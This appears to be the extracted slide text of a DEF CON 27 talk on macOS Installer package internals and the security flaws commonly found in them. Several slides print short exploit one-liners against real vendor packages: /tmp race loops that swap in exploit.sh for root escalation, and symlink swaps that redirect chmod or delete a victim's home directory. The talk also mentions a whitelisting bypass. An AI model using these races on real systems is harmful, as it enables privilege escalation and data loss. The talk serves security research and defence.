![Page 1: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/1.jpg)
A look inside macOS Installer packages and
common security flaws
![Page 2: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/2.jpg)
This is Me● Experience: 11 years professional, 20+ years hobbyist
○ Self-taught → Stanford → iSEC Partners → NCC Group
● Security consultant: appsec focus○ IC → Management → IC
![Page 3: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/3.jpg)
This is Me● Experience: 11 years professional, 20+ years hobbyist
○ Self-taught → Stanford → iSEC Partners → NCC Group
● Security consultant: appsec focus○ IC → Management → IC
● “Dana Vollmer’s husband” (5x Olympic Gold Medalist)
![Page 4: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/4.jpg)
This is Me● Experience: 11 years professional, 20+ years hobbyist
○ Self-taught → Stanford → iSEC Partners → NCC Group
● Security consultant: appsec focus○ IC → Management → IC
● “Dana Vollmer’s husband” (5x Olympic Gold Medalist)
http://www.zimbio.com/Hottest+Olympic+Husbands+and+Boyfriends/articles/u_giY9WHdG9/Dana+Vollmer+Husband+Andy+Grant
![Page 5: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/5.jpg)
Overview● Motivation
● The package
● Unpacking
● What can (and does) go wrong
![Page 6: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/6.jpg)
Why?● I’ve got trust issues
○ What’s really going on?
● All in a day’s work○ Sometimes there’s nothing else to look at
![Page 7: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/7.jpg)
A look at the package
![Page 8: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/8.jpg)
The Package - Outside● Mac OS X Installer flat package (.pkg extension)
○ Little to no official documentation■ Better unofficial (but incomplete) documentation
https://matthew-brett.github.io/docosx/flat_packages.htmlhttp://s.sudre.free.fr/Stuff/Ivanhoe/FLAT.html
● eXtensible ARchive (XAR)
● Helpful tools○ macOS pre-installed pkgutil○ Suspicious Package:
https://www.mothersruin.com/software/SuspiciousPackage/
![Page 9: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/9.jpg)
But what’s inside?
![Page 10: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/10.jpg)
Unpacking● The easy way
pkgutil --expand "/path/to/package.pkg" "/path/to/output/directory"
![Page 11: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/11.jpg)
Unpacking● The easy way
pkgutil --expand "/path/to/package.pkg" "/path/to/output/directory"
● The hacker waymkdir -p "/path/to/output/directory"
cd "/path/to/output/directory"
xar -xf "/path/to/package.pkg"
![Page 12: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/12.jpg)
The Package - Inside├── Distribution XML document text, ASCII text├── Resources directory└── <package>.pkg directory ├── Bom Mac OS X bill of materials (BOM) file ├── PackageInfo XML document text, ASCII text ├── Payload gzip compressed data, from Unix └── Scripts gzip compressed data, from Unix
![Page 13: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/13.jpg)
The Package - Distribution, PackageInfo, Bom● Distribution (XML + JavaScript)
○ Customizations (title, welcome text, readme, background, restart, etc)○ Script / installation checks (InstallerJS)
![Page 14: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/14.jpg)
The Package - Distribution, PackageInfo, Bom● Distribution (XML + JavaScript)
○ Customizations (title, welcome text, readme, background, restart, etc)○ Script / installation checks (InstallerJS)
● PackageInfo (XML)○ Information on the package○ Install requirements○ Installation location○ Paths to scripts to run
![Page 15: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/15.jpg)
The Package - Distribution, PackageInfo, Bom● Distribution (XML + JavaScript)
○ Customizations (title, welcome text, readme, background, restart, etc)○ Script / installation checks (InstallerJS)
● PackageInfo (XML)○ Information on the package○ Install requirements○ Installation location○ Paths to scripts to run
● Bill of materials (bom)○ List of files to install, update, or remove○ File permissions, owner/group, size, etc
![Page 16: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/16.jpg)
The Package - Payload, Scripts● Payload (CPIO archive, gzip)
○ The files to be installed○ Extracted to the install location specified in PackageInfo
![Page 17: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/17.jpg)
The Package - Payload, Scripts● Payload (CPIO archive, gzip)
○ The files to be installed○ Extracted to the install location specified in PackageInfo
● Scripts (CPIO archive, gzip)○ Pre- and post-install scripts and additional resources
■ Bash, Python, Perl, <executable + #!>○ Extracted to random temp directory for execution
![Page 18: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/18.jpg)
Unpacking - Scripts● gzip’d cpio files
cat Scripts | gzip -dc | cpio -i
![Page 19: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/19.jpg)
Unpacking - Scripts● gzip’d cpio files
cat Scripts | gzip -dc | cpio -i
● But cpio knows how to handle compressed files nativelycpio -i < Scripts
![Page 20: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/20.jpg)
Unpacking - Scripts● gzip’d cpio files
cat Scripts | gzip -dc | cpio -i
● But cpio knows how to handle compressed files nativelycpio -i < Scripts
If you did the easy way (pkgutil --expand) this was done for you and Scripts is a directory containing the archive’s contents
![Page 21: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/21.jpg)
Unpacking - Payload● Same as Scripts
cpio -i < Payload
![Page 22: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/22.jpg)
Unpacking - Payload● Same as Scripts
cpio -i < Payload
● Sometimes contains more .pkg files; recurse!
![Page 23: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/23.jpg)
Unpacking - Payload● Same as Scripts
cpio -i < Payload
● Sometimes contains more .pkg files; recurse!
Unlike Scripts, pkgutil --expand DOES NOT expand Payload for you
![Page 24: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/24.jpg)
What happens when I double click the .pkg?
![Page 25: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/25.jpg)
Installation - Order of operations (roughly)1. Installation checks, specified in Distribution:
<installation-check script="installCheck();"/>
![Page 26: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/26.jpg)
Installation - Order of operations (roughly)1. Installation checks, specified in Distribution:
<installation-check script="installCheck();"/>
2. Preinstall, specified in PackageInfo:<scripts>
<preinstall file="./preinstall"/>
</scripts>
![Page 27: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/27.jpg)
Installation - Order of operations (roughly)1. Installation checks, specified in Distribution:
<installation-check script="installCheck();"/>
2. Preinstall, specified in PackageInfo:<scripts>
<preinstall file="./preinstall"/>
</scripts>
3. Extract Payload to install-location from PackageInfo
![Page 28: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/28.jpg)
Installation - Order of operations (roughly)1. Installation checks, specified in Distribution:
<installation-check script="installCheck();"/>
2. Preinstall, specified in PackageInfo:<scripts>
<preinstall file="./preinstall"/>
</scripts>
3. Extract Payload to install-location from PackageInfo
4. Postinstall, specified in PackageInfo:<scripts>
<postinstall file="./postinstall"/>
</scripts>
![Page 29: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/29.jpg)
What can go wrong?
![Page 30: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/30.jpg)
Security - Where are the vulns?● Scripts
○ Preinstall○ Postinstall○ Helper scripts
● Payload○ Additional scripts (application helpers, uninstall scripts, etc)○ Normal native app issues (brush up on your reversing skills!)
■ Binary■ Libraries■ Kernel modules
![Page 31: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/31.jpg)
Security - Types of vulns● TOCTOU (minus the TOC)
● /tmp isn’t safe?!○ What about for reads? Nope○ What about for writes? Nope○ What about for executes? Nope
● Access for all!○ chmod 777
![Page 32: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/32.jpg)
Real vulns in real .pkgs (in the past 8 months)
![Page 33: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/33.jpg)
Into the Wild● Root privilege escalation
● Symlink abuse
● Privilege escalation
● Arbitrary directory deletion
● Arbitrary code execution
![Page 34: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/34.jpg)
Into the Wild - Root privilege escalation● Vulnerability
○ Payload includes /var/tmp/Installerutil○ Postinstall:
sudo /var/tmp/Installerutil --validate_nsbrandingfile
"$NSBRANDING_JSON_FILE" "$NSINSTPARAM_JSON_FILE"
● Attack - Logged in non-root user attacking IT admin installing software○ Exploit:
while [ ! -f /var/tmp/Installerutil ]; do :; done; rm
/var/tmp/Installerutil; cp exploit.sh /var/tmp/Installerutil
![Page 35: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/35.jpg)
Into the Wild - Symlink abuse● Vulnerability
○ Preinstall:sudo rm /var/tmp/nsinstallation
○ Postinstall:sudo chmod 777 /var/tmp/nsinstallation
sudo chown "${CONSOLE_USER}" /var/tmp/nsinstallation
● Attack - Any user/process attacking system administrator○ Exploit:
touch /var/tmp/nsinstallation; while [ -f /var/tmp/nsinstallation
]; do :; done; ln -s /Applications /var/tmp/nsinstallation
![Page 36: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/36.jpg)
Into the Wild - Privilege escalation● Vulnerability
○ Preinstall:rm -rf /tmp/7z
unzipresult=$(/usr/bin/unzip -q "$APP_FOLDER/7z.zip" -d "/tmp")
un7zresult=$(/tmp/7z x "${APP_FOLDER}/xy.7z" -o "$APP_FOLDER")
● Attack - Any user/process attacking installing user○ Exploit:
cp exploit.sh /tmp/7z
![Page 37: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/37.jpg)
Into the Wild - Arbitrary directory deletion● Vulnerability
○ Helper script inside Payload:# Clean up garbage
rm -rf /tmp/sdu/*
rmdir /tmp/sdu/
● Attack - Any user/process attacking user running installed application○ Exploit:
ln -s /Users/victim /var/sdu
![Page 38: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/38.jpg)
Into the Wild - Arbitrary code execution● Vulnerability
○ PackageInfo:<pkg-info install-location="/tmp/RazerSynapse" auth="root">
○ Postinstall:cd /tmp/RazerSynapsefor package in /tmp/RazerSynapse/*.pkg
do
installer -pkg "${package}" -target /
![Page 39: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/39.jpg)
Into the Wild - Arbitrary code execution● Vulnerability
○ PackageInfo:<pkg-info install-location="/tmp/RazerSynapse" auth="root">
○ Postinstall:cd /tmp/RazerSynapsefor package in /tmp/RazerSynapse/*.pkg
do
installer -pkg "${package}" -target /
![Page 40: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/40.jpg)
Into the Wild - Arbitrary code execution● DEMO!
○ Download target package○ Extract files from .pkg○ Check Distribution for installation-checks / script○ Check PackageInfo for install-location and scripts○ Extract files from Scripts○ Check scripts for vulns○ Craft exploit for discovered vuln○ “Deliver” exploit and wait for installation○ Install package○ Profit!
![Page 41: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/41.jpg)
Into the Wild - Demo
https://www.youtube.com/watch?v=OvlSLCVgaMs
![Page 42: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/42.jpg)
That Was Unexpected● “No payload” packages leave no receipts
○ Nothing was “installed”, so no system record of the installation occurring○ For minimal clicks, do everything during the installation checks
● Application Whitelisting (Google’s Santa) bypass: https://www.praetorian.com/blog/bypassing-google-santa-application-whitelisting-on-macos-part-1○ On macOS, app whitelisting is at the execve level, and installer is whitelisted○ Code run via installation checks and pre- and post-install scripts run as installer
![Page 43: A look inside macOS Installer packages and common security ... CON 27/DEF CON 27... · Into the Wild - Arbitrary code execution DEMO! Download target package Extract files from .pkg](https://reader033.vdocuments.us/reader033/viewer/2022050408/5f856951c309451a13350969/html5/thumbnails/43.jpg)
Questions?@andywgrant